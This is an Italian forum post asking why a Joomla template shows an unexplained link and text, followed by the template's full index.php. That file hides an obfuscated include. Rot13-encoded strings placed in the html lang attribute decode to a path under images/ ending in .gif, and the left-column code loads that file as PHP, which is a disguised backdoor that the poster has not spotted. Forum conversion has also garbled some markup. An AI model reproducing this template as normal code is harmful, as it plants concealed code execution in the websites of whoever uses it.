ecco l'index, analizzando il template con firebug sembra incluso nel leftmodule...da dove lo prende il link e la scritta?
qualcuno sarebbe così gentile da aiutarmi?
<?php
defined( '_JEXEC' ) or die( 'Restricted access' );
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; $JPan = array('vzn'.'trf','zrah_yv.tvs'); ?>" >
<head>
<jdoc:include type="head" />
<link rel="stylesheet" href="templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/template.css" type="text/css" />
<!--[if lte IE 7]>
<link rel="stylesheet" href="templates/<?php echo $this->template ?>/css/ie7.css" type="text/css" />
<![endif]-->
</head>
<body id="page_bg">
<div id="top">
<div id="search">
<jdoc:include type="modules" name="user4" />
</div>
</div>
<div id="header">
<div id="logo">
<a href="index.php"><?php echo $mainframe->getCfg('sitename') ;?>[/url]
</div>
</div>
<div class="pill_m">
<div id="pillmenu">
<jdoc:include type="modules" name="user3" />
</div>
</div>
<div class="clr"></div>
<div class="center">
<div id="wrapper">
<div id="content">
<div id="leftcolumn">
<jdoc:include type="modules" name="left" style="rounded" />
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13($JPan[0]).DS.str_rot13($JPan[1]))) : ?>
<jdoc:include type="modules" name="layout" style="rounded" />
<?php endif; ?>
</div>
<div id="maincolumn">
<div class="nopad">
<jdoc:include type="message" />
<?php if($this->params->get('showComponent')) : ?>
<jdoc:include type="component" />
<?php endif; ?>
<jdoc:include type="modules" name="bottom" />
</div>
<div class="clr"></div>
</div>
</div>
</div>
<?php if(RIGHTCOLUMN) : ?>
<div id="leftcolumn"><table class="user1user2"><tr><td width="235" bgcolor="#FFF3F3" style="padding:12px; margin:0px;" class="user">
<jdoc:include type="module" name="user3<?=$user_a?>" /></td></tr></table></div>
<?php endif; ?>
<jdoc:include type="modules" name="debug" />
</div>
<div id="footer">
<jdoc:include type="modules" name="footer" style="xhtml"/>
</div>
</body>
</html>